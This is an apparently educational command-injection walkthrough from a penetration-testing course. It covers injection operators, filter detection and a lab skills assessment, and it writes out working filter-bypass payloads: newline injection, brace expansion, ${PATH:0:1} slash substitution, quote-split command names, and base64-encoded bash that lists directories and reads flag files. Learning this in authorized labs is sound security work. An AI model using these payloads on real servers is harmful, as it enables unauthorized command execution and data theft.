Intro to Command Injection Vulnerabilities

A Command Injection vulnerability ranks among the most dangerous security flaws a web application can have. It enables an attacker to run arbitrary operating-system commands on the server that hosts the application, potentially giving them control over that server and a path into the wider network. When a web app accepts input from users and uses that input to build or run a system command on the back end — then returns or processes the command’s output — an attacker can often craft a specially formed payload that alters the intended command. By doing so the attacker can make the server execute commands of their choosing instead of (or in addition to) the legitimate ones.

What Injection Flaws Are

Injection flaws are ranked high in severity on OWASP’s Top 10 (they commonly appear near the top of the list) because they are both widespread and capable of causing extensive damage. An injection occurs when data supplied by a user is treated as part of a query, command, or program fragment rather than as inert data. That misinterpretation allows the attacker to change the structure or logic of the executed statement so that it performs actions the developer never intended — often actions that benefit the attacker.

Different kinds of injection exist depending on what kind of query or interpreter is being fed user data. Some of the most frequent varieties you will encounter in web applications are:

Table of common injection types

- OS Command Injection — happens when attacker-controlled input is concatenated into or otherwise used as part of an operating-system command executed on the server.

- Code Injection — takes place when untrusted input is evaluated by a language interpreter or an eval-like function, allowing arbitrary code execution.

- SQL Injection — occurs when input is embedded in an SQL statement without proper handling, enabling reading, modification, or deletion of database records.

- Cross-Site Scripting (XSS) / HTML Injection — happens when raw user input is reflected into a web page or HTML context and is executed in other users’ browsers.

Numerous other injection vectors also exist: LDAP injection, NoSQL injection, HTTP header injection, XPath injection, IMAP injection, ORM-level injection and more. The common root cause is the same — user input incorporated into an interpreter or query without appropriate constraints or sanitization. Attackers often “break out” of the intended input boundaries and inject extra tokens, operators, or code that alter the parent query’s semantics. As web platforms and technologies evolve, new interpreters and query languages appear, and with them new forms of injection vulnerabilities emerge.

OS Command Injections (details)

OS Command Injection requires that attacker-controlled data is fed — directly or indirectly — into some mechanism that constructs and runs operating-system commands on the back end. Most server-side languages provide facilities to execute shell or system commands (for example: system(), exec(), popen(), Runtime.exec(), subprocess, etc.), and developers sometimes use them to perform legitimate tasks: installing packages, invoking utilities, starting background jobs, or querying system state. If those command-building operations incorporate raw user input without strict validation, an attacker can append additional commands, use command separators, or inject shell metacharacters to change what the OS executes. The consequences are severe: from data theft and service disruption to full server compromise and lateral movement inside a network.
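To make the risk concrete, here is a minimal Python sketch of the pattern described above. The function names and the ping command line are assumptions chosen for illustration, not code from any real application. Nothing is executed; the sketch only shows what each approach would hand to the operating system.

```python
import ipaddress


def build_vulnerable_command(ip: str) -> str:
    """Hypothetical unsafe pattern: raw input concatenated into a shell string."""
    # If this string were run through a shell, any metacharacters in `ip`
    # would be interpreted by that shell.
    return f"ping -c 1 {ip}"


def build_safe_argv(ip: str) -> list:
    """Hypothetical safer pattern: validate first, then build an argument list."""
    # ipaddress.ip_address raises ValueError for anything that is not an IP.
    validated = ipaddress.ip_address(ip)
    # An argument list run without a shell treats the value as one argument.
    return ["ping", "-c", "1", str(validated)]


print(build_vulnerable_command("127.0.0.1; whoami"))
print(build_safe_argv("127.0.0.1"))
try:
    build_safe_argv("127.0.0.1; whoami")
except ValueError as error:
    print("rejected:", error)
```

The first function produces a string in which the semicolon would start a second command once a shell parses it. The second rejects the same input before any command is built.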

Detection

Finding basic OS Command Injection flaws often follows the same hands-on approach used to exploit them: try to inject extra commands and observe whether the server’s response changes. In practice you supply carefully crafted input that attempts to break out of the expected command string — for example by appending a separator and an extra command — and then watch the output or behavior. If the response deviates from the normal, expected result (for instance it now contains output from your injected command, an unexpected error, or a timing difference), you’ve likely discovered a command injection.

That said, not every injection is obvious. More advanced or partially mitigated injections may require techniques beyond simple append-and-observe. Manual fuzzing (systematically sending many variations), targeted payload tuning (incrementally building more complex injection strings), static or dynamic code review, and source-aided analysis can all reveal injection points that casual testing misses. Blind command injections — where the server doesn’t return command output directly — call for indirect checks like time-based probes or out-of-band interactions (DNS/HTTP callbacks) to confirm execution.

This module concentrates on the straightforward cases: situations where user-supplied data flows directly into a system command execution function without proper sanitization or escaping. For those, the testing loop is: craft a probe, send it, compare the response to a baseline, and refine the payload until the injected command is executed or you’ve exhausted reasonable options. Always record the minimal payload that demonstrates the issue and be mindful of environment differences (shell, user privileges, platform-specific separators) that affect how an injection behaves.
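The "craft a probe" step of that loop can be sketched in a few lines of Python. The helper name `build_probes` and the choice of `whoami` as a marker command are assumptions for illustration; the operators are the ones used in this module.

```python
from urllib.parse import quote

# Operators discussed in this module, keyed by a readable name.
OPERATORS = {
    "semicolon": ";",
    "new-line": "\n",
    "background": "&",
    "pipe": "|",
    "and": "&&",
    "or": "||",
}


def build_probes(baseline_value: str, marker_command: str) -> dict:
    """Return {operator name: URL-encoded probe} for a single parameter value."""
    probes = {}
    for name, operator in OPERATORS.items():
        raw = f"{baseline_value}{operator}{marker_command}"
        # safe="" forces every reserved character to be percent-encoded.
        probes[name] = quote(raw, safe="")
    return probes


for name, probe in build_probes("127.0.0.1", "whoami").items():
    print(f"{name:10} {probe}")
```

Each generated value can be pasted into the tested parameter and the response compared against the baseline.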





Try adding any of the injection operators after the IP address in the IP field. What does the error message say (in English)?

Injecting Commands



So far we’ve determined that the Host Checker web application appears likely to be vulnerable to command-injection issues and have reviewed several techniques for testing it. We’ll start active probing by using the shell command separator — the semicolon (;) — appending it to user input to attempt to chain an extra command and watch whether the server executes it. While doing this, work from a clean baseline, carefully compare responses to normal behavior, record every trial and response, and avoid destructive commands; always ensure you have explicit authorization and maintain detailed logs of your testing.

Review the HTML source code of the page to find where the front-end input validation is happening. On which line number is it?

Open the address in your browser and press CTRL + U to view the page source.

<!DOCTYPE html>

<html lang="en">

<head>

<meta charset="UTF-8">

<title>Host Checker</title>

<link rel="stylesheet" href="./style.css">

</head>

<body>

<div class="main">

<h1>Host Checker</h1>

<form method="post" action="">

<label>Enter an IP Address</label>

<input type="text" name="ip" placeholder="127.0.0.1" pattern="^(((\d{1,2}|1\d{2}|2[0-4]\d|25[0-5])\.){3}(\d{1,2}|1\d{2}|2[0-4]\d|25[0-5]))$">

<button type="submit">Check</button>

</form>

<p>

<pre>

</pre>

</p>

</div>

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>

</body>

</html>
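The `pattern` attribute on the input field is checked only by the browser, so it says nothing about what the server will accept. The Python sketch below approximates that browser-side check and then builds a request body that never passes through it. The helper name `browser_would_accept` is an assumption for illustration.

```python
import re
from urllib.parse import urlencode

# The pattern attribute copied from the form's <input> element.
IP_PATTERN = re.compile(
    r"^(((\d{1,2}|1\d{2}|2[0-4]\d|25[0-5])\.){3}"
    r"(\d{1,2}|1\d{2}|2[0-4]\d|25[0-5]))$"
)


def browser_would_accept(value: str) -> bool:
    """Approximate the browser-side check performed by the pattern attribute."""
    return IP_PATTERN.fullmatch(value) is not None


print(browser_would_accept("127.0.0.1"))          # True
print(browser_would_accept("127.0.0.1; whoami"))  # False

# A request body built outside the browser never goes through that check.
body = urlencode({"ip": "127.0.0.1; whoami"})
print(body)  # ip=127.0.0.1%3B+whoami
```

This is why the payloads in the rest of this walkthrough are sent from an intercepting proxy rather than typed into the form.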

Alternative Injection Operators

Before moving on, let’s experiment with some additional shell operators to see how the target web application reacts differently to each one.



Using the AND operator (&&)

A common technique is to use the logical AND operator (&&) to chain commands so the second command runs only if the first succeeds. For example, if we craft the payload 127.0.0.1 && whoami, and it gets injected into a ping invocation, the final command executed on the server would look like:

ping -c 1 127.0.0.1 && whoami

Always test payloads locally first to confirm syntax and behavior. On a Linux VM we might run:

21y4d@lab[/htb]$ ping -c 1 127.0.0.1 && whoami

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.

64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=1.03 ms

--- 127.0.0.1 ping statistics ---

1 packets transmitted, 1 received, 0% packet loss, time 0ms

rtt min/avg/max/mdev = 1.034/1.034/1.034/0.000 ms

21y4d



Because the ping command succeeded, the whoami output is printed afterward. Note the practical test workflow: copy your payload, paste it into the vulnerable parameter in your HTTP request (for example inside Burp), URL-encode it if necessary, send the request, and compare the response to your baseline. In this case you should see outputs from both the original command and your injected command.

Consider edge cases: if you try to begin a payload with && without a valid preceding command (for example && whoami), the shell will usually return a syntax error because && requires a left-hand command to evaluate first. That means && is best used when you can append to an existing command string that reliably succeeds.

Using the OR operator (||)

The OR operator (||) executes the second command only if the first one fails (i.e., returns a non-zero exit status). That behavior can be useful when appending anything to the original command would otherwise fail or terminate prematurely — you can make your injected command run only in a failure scenario. For instance:

ping -c 1 127.0.0.1 || whoami

Because the ping succeeds in this example, whoami is not executed. Bash will short-circuit when the first command returns exit code 0.

If we deliberately break the original command so it fails, the OR chain will run the second command. Example:

21y4d@lab[/htb]$ ping -c 1 || whoami

ping: usage error: Destination address required

21y4d

Here the ping produced an error and returned a non-zero exit code, so whoami executed and its output appears. In a web request, this often produces a cleaner result because you can intentionally disrupt the original command and trigger only your injected payload, yielding less noisy output to interpret.
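The short-circuit behavior of both operators can be confirmed without touching ping at all. The sketch below assumes a POSIX system where `/bin/sh`, `true`, and `false` are available; `run_chain` is a helper name invented for this example.

```python
import subprocess


def run_chain(command: str) -> str:
    """Run a command line through /bin/sh and return its standard output."""
    result = subprocess.run(
        command, shell=True, capture_output=True, text=True, check=False
    )
    return result.stdout.strip()


# `true` always exits 0 and `false` always exits non-zero.
print(repr(run_chain("true && echo injected")))   # 'injected'
print(repr(run_chain("false && echo injected")))  # ''
print(repr(run_chain("true || echo injected")))   # ''
print(repr(run_chain("false || echo injected")))  # 'injected'
```

In other words, && needs the original command to succeed, while || needs it to fail.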

Practical testing workflow

- Verify locally (in a safe lab) that your operator and payload behave as expected.

- Inject the payload into the web parameter (remember to URL-encode problematic characters).

- Send the request and compare the response with your baseline results.

- Record the minimal payload that demonstrates execution and note platform-specific differences (shell type, quoting rules, sanitization).
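The "compare with your baseline" step can be sketched as a simple line comparison. The function name is an assumption, and the sample text is taken from the local ping test shown earlier rather than from a real HTTP response.

```python
def injected_lines(baseline: str, probed: str) -> list:
    """Return the lines of `probed` that do not occur in `baseline`."""
    known = set(baseline.splitlines())
    return [line for line in probed.splitlines() if line not in known]


# Sample text taken from the local ping test shown earlier in this section.
baseline_response = (
    "PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.\n"
    "64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=1.03 ms\n"
)
probed_response = baseline_response + "21y4d\n"

print(injected_lines(baseline_response, probed_response))  # ['21y4d']
```

Against a live target, values such as round-trip times change between requests, so expect some noise and treat the result as a hint about where to look.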

Other operators and contexts

These shell operators are not the only trick in the box. Injection vectors vary across interpreters and query languages, and many operators or escape sequences are useful depending on the target. Below is a condensed reference table of common operators and where they’re typically used:

- SQL Injection: ' , ; -- /* */

- Command Injection: ; && ||

- LDAP Injection: * ( ) & |

- XPath Injection: ' or and not substring concat count

- OS Command Injection: ; & |

- Code Injection: ' ; -- /* */ $() ${} #{} %{} ^

- Directory Traversal / Path Traversal: ../ ..\\ %00

- Object Injection: ; & |

- XQuery Injection: ' ; -- /* */

- Shellcode Injection: \x \u %u %n

- Header Injection (HTTP): \n \r\n \t %0d %0a %09

This list is intentionally not exhaustive — many more operators, escape sequences, and interpreter-specific constructs exist. Which operators work depends heavily on the environment: the shell in use (bash, sh, powershell), how the application constructs and quotes commands, the language and framework, and any sanitization applied.

Where this module focuses

In this module we concentrate on direct command injections: cases where user input flows straight into a system command execution function and the application returns the command output to us. Direct injections are often the easiest to detect and validate. Later modules (or references such as a dedicated Whitebox Pentesting guide) cover indirect and blind injections, out-of-band callbacks, advanced sanitization bypasses, and code review techniques that reveal more subtle or partial injection vectors.

Final notes and safety

- Always work from a controlled baseline and an isolated test environment.

- Use the simplest payload that demonstrates execution and document it.

- Be mindful of quoting, URL encoding, and how the server parses input — these factors strongly influence which operators succeed.

- Remember: operators useful for command injection also appear in other injection classes (SQL, LDAP, XSS, SSRF, etc.), so adjust your payloads to the context you’re testing.

With these operator behaviors understood, you can tailor injection strings more effectively and decide whether to append with ;, chain with &&, or fall back with || depending on the target’s response semantics.





Try using the remaining three injection operators (new-line, &, |), and see how each works and how the output differs. Which of them only shows the output of the injected command?







Intercept the request using Burp Suite, then right-click it and choose Send to Repeater.

Modify the request to use the & operator.

That response does not give us the answer, so let’s try | instead.

Identifying Filters

Even when developers try to harden an application against injection attacks, insecure coding patterns or incomplete defenses can leave exploitable gaps. One common defensive approach is a blacklist: rejecting requests that contain certain characters, keywords, or suspicious patterns. Another common layer is a Web Application Firewall (WAF), which can provide broader, rule-based protection and block many classes of attacks (SQLi, XSS, command injection, etc.). But both mechanisms have limits — blacklists can be evaded and WAFs can be misconfigured or tuned too loosely — so it’s important to learn how these protections signal what they’re blocking and how to accurately fingerprint them during testing.

What filters look like in practice

- Blacklisted characters/words: The server may drop, escape, or reject requests that include characters such as ;, &, |, ||, &&, quotes, or common “dangerous” tokens like rm, wget, curl, nc, whoami. Blocking might be case-sensitive or case-insensitive, strict or partial (e.g., blocking whoami but allowing WhoAmI).

- WAF responses: A WAF often returns distinctive HTTP status codes (403, 406), custom HTML error pages, or specific JSON error objects. Sometimes responses include generic “blocked by WAF” text, while other times they return subtle differences such as truncated output, altered headers, or rate-limited behavior.

- Silent filtering / sanitization: Some defenses attempt to sanitize input silently (removing or encoding harmful characters) rather than rejecting it outright. That can make it appear as if the parameter is accepted while the underlying command receives a different string.

How to detect what’s being blocked

- Baseline and compare: Always start with a known-good request and compare responses after injecting test tokens. Look for differences in HTTP status codes, response bodies, headers, response length, and timing.

- Error messages & headers: Examine returned HTML, JSON, and headers for clues. A custom error page, a specific server header, or an inline message like “request denied” can point to a filtering mechanism or a WAF vendor.

- Response timing: Some protections implement throttling or latency-based checks. If certain payloads produce consistent delays or immediate rejections, that behavior may reveal rate limiting or deeper inspection.

- Encoding/normalization effects: If your payload is altered (characters replaced, removed, or encoded), the server is performing normalization or sanitization. Noting exactly how input changes helps you infer the filtering rules.

- Partial echoes: If part of your payload appears in the response but other parts are stripped, you can map the exact characters or tokens being removed or escaped.

Techniques for mapping filters (high level)

- Incremental probes: Send small, controlled variations of payloads to discover which characters or substrings trigger blocking. For example, single characters, then short operator sequences, then words. Record precisely which inputs change behavior.

- Alternate encodings: Observing whether URL encoding, percent-encoding, or Unicode encodings are accepted or rejected can reveal whether the filter checks raw input, the decoded value, or normalized values.

- Case and spacing tests: Some blacklists are case-insensitive while others are not. Try variations in case or insert benign whitespace/quotes to see if the filter matches literally or with normalization.

- Observe side effects: If a payload triggers different application logic (redirects, debug pages, CAPTCHA), that’s a signal a higher-level control (WAF, bot protection) is intervening rather than the application code itself.

- Logging & out-of-band indicators: When available during authorized testing, consult server logs, WAF logs, or SIEM events to see exact matching rules or signatures that fired. This is the most direct way to know what was blocked.
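The incremental-probe idea from the list above can be sketched as a small mapping loop. Everything here is hypothetical: `fake_blacklist` stands in for the target so the example runs offline, and its three blocked tokens are invented. Against a real application, `is_blocked` would send a request and compare the response with the baseline.

```python
from typing import Callable


def map_filter(probes: list, is_blocked: Callable[[str], bool]) -> dict:
    """Send each probe through `is_blocked` and record the verdict."""
    return {probe: ("blocked" if is_blocked(probe) else "allowed") for probe in probes}


def fake_blacklist(value: str) -> bool:
    """Hypothetical stand-in for the target: blocks three literal tokens."""
    return any(token in value for token in (";", "&", "whoami"))


# Incremental probes: single characters first, then operators, then words.
probes = [";", "&", "|", "\n", "&&", "||", "whoami", "WhoAmI"]

for probe, verdict in map_filter(probes, fake_blacklist).items():
    print(f"{probe!r:10} {verdict}")
```

The resulting dictionary is a starting point for the "input → server behavior" matrix; in this made-up case it shows a case-sensitive word match, because WhoAmI passes while whoami does not.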

Common pitfalls and caveats

- False positives and noisy rules: WAF rules can generate false positives — benign payloads might be blocked — so validating in a test environment or with log access is important before drawing conclusions.

- Environment variability: Filters may be applied at different tiers (application, reverse proxy, CDN, WAF). A request that passes one tier may be blocked later, complicating detection unless you correlate responses and logs across layers.

- Security through obscurity: Some defenses try to hide their behavior; they may return generic responses or deliberately misleading pages. Focus on measurable differences (status codes, timing, content length) rather than on ambiguous wording.

Practical tester recommendations

- Start non-destructively: Use benign probes that reveal filtering without causing harm. Record everything (requests, responses, timings).

- Exhaust passive sources first: Look for error messages, headers, or WAF banners that identify middleware. Where permitted, consult logs—WAF and application logs quickly reveal matched rules.

- Automate mapping carefully: Use small, systematic sets of probes to map which characters or patterns are filtered, but avoid aggressive automation that could trigger rate limits or alarms.

- Document findings: Produce a clear matrix of “input → server behavior” showing which tokens are blocked, modified, or allowed. This helps distinguish between application-layer sanitization and external WAF/edge protections.

- Report responsibly: When you discover filtering or WAF behaviors, include proof that is minimal and non-destructive, and indicate whether the finding is a bypassable filter or an effective mitigation.

Try all other injection operators to see if any of them is not blacklisted. Which of (new-line, &, |) is not blacklisted by the web application?



Use what you learned in this section to execute the command ‘ls -la’. What is the size of the ‘index.php’ file?

Use the payload below:

ip=127.0.0.1%0a{ls,-la}
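Two things happen in this payload: `%0a` decodes to a new-line, which starts a new command, and Bash brace expansion turns `{ls,-la}` into the two words `ls` and `-la` without a literal space ever appearing in the request. The Python sketch below decodes the value and emulates the expansion. `expand_braces` is a deliberately tiny stand-in written for this example, not a full implementation of Bash brace expansion.

```python
from urllib.parse import unquote


def expand_braces(word: str) -> list:
    """Tiny emulation of Bash brace expansion for one flat {a,b,...} word."""
    if word.startswith("{") and word.endswith("}") and "," in word:
        return word[1:-1].split(",")
    return [word]


payload = "127.0.0.1%0a{ls,-la}"
decoded = unquote(payload)
print(repr(decoded))  # '127.0.0.1\n{ls,-la}'

# The new-line ends the ping arguments; the next line is a separate command.
first_line, second_line = decoded.split("\n")
print(expand_braces(second_line))  # ['ls', '-la']
```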

Bypassing Other Blacklisted Characters

In addition to operators and whitespace, many filters commonly block the forward slash (/) and backslash (\) because they are used to denote filesystem paths on Linux and Windows. When those characters are banned, testers can still achieve the same effect by using alternate representations and techniques that produce or reference equivalent path-like values without typing the literal / or \. Examples include using encoded forms (percent-encoding or Unicode escapes), constructing values from permitted characters at runtime, leveraging environment variables or programmatic concatenation, or relying on application behavior that normalizes or decodes input before it reaches the command context. The right approach depends on how the application parses and transforms input, so probe incrementally, compare responses to a clean baseline, and document which encodings or constructs bypass the filter while remaining non-destructive and within your authorization.

Use what you learned in this section to find the name of the user in the ‘/home’ folder. What user did you find?

Use the payload below:

ip=127.0.0.1%0a{ls,${PATH:0:1}home}
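The `${PATH:0:1}` part is Bash substring expansion: it takes one character of the PATH variable starting at offset 0. On a typical Linux host PATH begins with `/`, so the expression yields a slash without the payload containing one. The sketch below emulates only that simple numeric form; the function name and the sample PATH value are assumptions for illustration.

```python
import re


def expand_substrings(text: str, env: dict) -> str:
    """Emulate Bash ${NAME:offset:length} for the simple numeric case only."""
    def replace(match):
        name = match.group(1)
        offset, length = int(match.group(2)), int(match.group(3))
        return env.get(name, "")[offset:offset + length]

    return re.sub(r"\$\{(\w+):(\d+):(\d+)\}", replace, text)


# Assumed environment: PATH on a typical Linux host begins with "/".
sample_env = {"PATH": "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"}

print(expand_substrings("${PATH:0:1}home", sample_env))  # /home
```

If PATH on the target started with a different character, the expansion would produce that character instead, so it is worth confirming the result with a harmless command first.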

Evading Blacklisted Command Names

We’ve already looked at ways to work around filters that block individual characters. Handling blacklists that target entire command names is a different challenge: rather than filtering single symbols, these defenses look for specific words or tokens (for example, common utility names). If the application rejects requests containing those exact strings, one general strategy is to change how the command appears so it no longer matches the blacklist while still achieving the intended effect.

There are many approaches to obscuring or transforming command text, ranging from very simple character substitutions and spacing tricks to far more elaborate encodings and runtime constructions. Some techniques are low-effort and easy to test manually; others rely on dedicated obfuscation tools that automatically alter payloads in complex ways. In practical testing, the goal is to alter the observable representation of the command enough to bypass literal string matches while remaining within the allowed scope of your engagement and avoiding destructive actions.

Later in this course we’ll outline the different families of obfuscation approaches and introduce several tooling options that can automate more advanced transformations. For now, note that manual obfuscation methods can often be used as quick probes to see whether a blacklist performs literal matches or performs deeper normalization, and that documenting which transformations trigger different behaviors is an important part of responsible testing.

Use what you learned in this section to find the content of flag.txt in the home folder of the user you previously found.

Use the payload below:

ip=127.0.0.1%0a{c'a't,${PATH:0:1}home${PATH:0:1}1nj3c70r${PATH:0:1}flag.txt}
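The `c'a't` trick works because the shell removes quotes while parsing a word, whereas a filter that looks for the literal string `cat` sees only `c'a't`. The Python sketch below shows both views. The blacklist contents and the function name are hypothetical, and `shlex` is used only because it follows POSIX quoting rules.

```python
import shlex

BLACKLIST = ("cat", "whoami", "ls")  # hypothetical literal word blacklist


def literal_filter_hits(value: str) -> list:
    """Return the blacklisted words found by a plain substring match."""
    return [word for word in BLACKLIST if word in value]


obfuscated = "c'a't"
print(literal_filter_hits(obfuscated))  # []
# shlex applies POSIX shell quoting rules, so the quotes are removed.
print(shlex.split(obfuscated))  # ['cat']
```

Note that the quotes must be balanced (an even number of the same type), otherwise the shell reports an unterminated string instead of running the command.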

Advanced Command Obfuscation

When simple evasions fail—because the target is protected by a tuned WAF, multi-stage input normalization, or sophisticated filtering—you’ll need more robust obfuscation approaches. Advanced obfuscation focuses on making the malicious payload harder to recognize by inspection or signature rules while still letting the target interpreter reconstruct and execute the intended commands. This typically means pushing complexity into how the command is represented or how it’s assembled at runtime so static pattern-matching is less effective.

Tactically, advanced techniques combine multiple layers of transformation: changing the superficial representation of tokens, splitting or concatenating pieces at runtime, leveraging benign-looking constructs that resolve to the same operations, or relying on interpreter features that perform implicit decoding or evaluation. The goal is not brute-force stealth but to nudge the payload across the ambiguous boundary between “suspicious” and “ordinary” input so that detection rules either miss it or normalize it into a harmless form only after your pieces have been assembled.

Important operational considerations accompany these techniques. Always perform them in isolated test environments or under explicit written authorization; advanced obfuscation can more easily become destructive or noisy. Keep your tests minimal and well-documented, monitor logs closely (application, WAF, and network), and coordinate with defenders if your engagement permits. Finally, remember that obfuscation is an arms race: as you layer evasions, defenders will adapt with more context-aware detection. Your work should therefore focus both on proving the presence of weaknesses and on providing clear remediation advice (e.g., proper input handling, strong allow-lists/whitelists, contextual escaping, and secure use of interpreter APIs) so the protection improves faster than the bypass techniques.



Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1

Open the web page and intercept the request with Burp Suite.

Right-click the request and choose Send to Repeater.

On the Repeater tab, use the payload below:

%0abash<<<$(base64%09-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)
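The payload above is the target command encoded as Base64 and handed to bash through here-strings, with `%0a` (new-line) as the injection operator and `%09` (tab) in place of a space. A small Python helper can rebuild it from any command; the name `build_payload` is an assumption for illustration.

```python
import base64


def build_payload(command: str) -> str:
    """Wrap `command` the same way as the payload shown above."""
    encoded = base64.b64encode(command.encode()).decode()
    # %0a is a URL-encoded new-line; %09 is a URL-encoded tab used as a space.
    return f"%0abash<<<$(base64%09-d<<<{encoded})"


command = "find /usr/share/ | grep root | grep mysql | tail -n 1"
print(build_payload(command))
```

Because the command travels as Base64, none of its spaces, pipes, or slashes appear in the request for a character filter to match.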

And get the flag.

Skills Assessment

You’ve been hired to carry out a penetration test for an organization. During your assessment you find a web-based file manager that looks promising — since file managers often run system-level commands, it becomes a candidate for command-injection testing.

Apply the techniques covered in this module to discover whether a command-injection flaw exists, and if so, exploit it while bypassing any input filtering that may be in place.

What is the content of ‘/flag.txt’?

While we wait a few minutes for the target services to finish booting, let’s get Burp Suite ready — set it to listening only with Intercept turned off. For the record, I’m using the Community Edition; it’s been good enough for my work so far. If any of you have the Professional edition, I’m jealous — hopefully I’ll upgrade someday, haha.



I want Burp configured this way so we can record every request sent to the portal and inspect them later for parameters that might be vulnerable to command injection. Open the page and log in.



Navigate through the site to enumerate the endpoints.



The vulnerability is behind this link:







On the next screen the file manager will appear with several available actions; select Move.



That action will take you back to the main interface. You may see an error message appear at the top of the page after doing this, but it’s not a concern. What we care about is the HTTP request that was issued when you clicked Move — inspect that request.



Good — let’s inspect that request in Burp.



Right click on it and choose Send to Repeater. Let’s try some payloads.

%0awhoami



%0abash<<<$(base64%09-d<<<d2hvYW1p)

%0abash<<<$(base64%09-d<<<bHM=)

%0abash<<<$(base64%09-d<<<bHMgLWxhIC8=)

Use the payload below to get the flag.

%0abash<<<$(base64%09-d<<<Y2F0IC9mbGFnLnR4dA==)
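To keep track of what each Base64 payload in this assessment runs, the blobs can be decoded locally. The sketch below is a convenience helper written for this walkthrough; the function name is an assumption.

```python
import base64
import re

payloads = [
    "%0abash<<<$(base64%09-d<<<d2hvYW1p)",
    "%0abash<<<$(base64%09-d<<<bHM=)",
    "%0abash<<<$(base64%09-d<<<bHMgLWxhIC8=)",
    "%0abash<<<$(base64%09-d<<<Y2F0IC9mbGFnLnR4dA==)",
]


def decode_payload(payload: str) -> str:
    """Extract the Base64 blob after the last <<< and decode it."""
    blob = re.search(r"<<<([A-Za-z0-9+/=]+)\)$", payload).group(1)
    return base64.b64decode(blob).decode()


for payload in payloads:
    print(decode_payload(payload))
```

The four payloads decode to whoami, ls, ls -la / and cat /flag.txt, which matches the order of the steps above: confirm execution, list the directory, list the root, then read the flag.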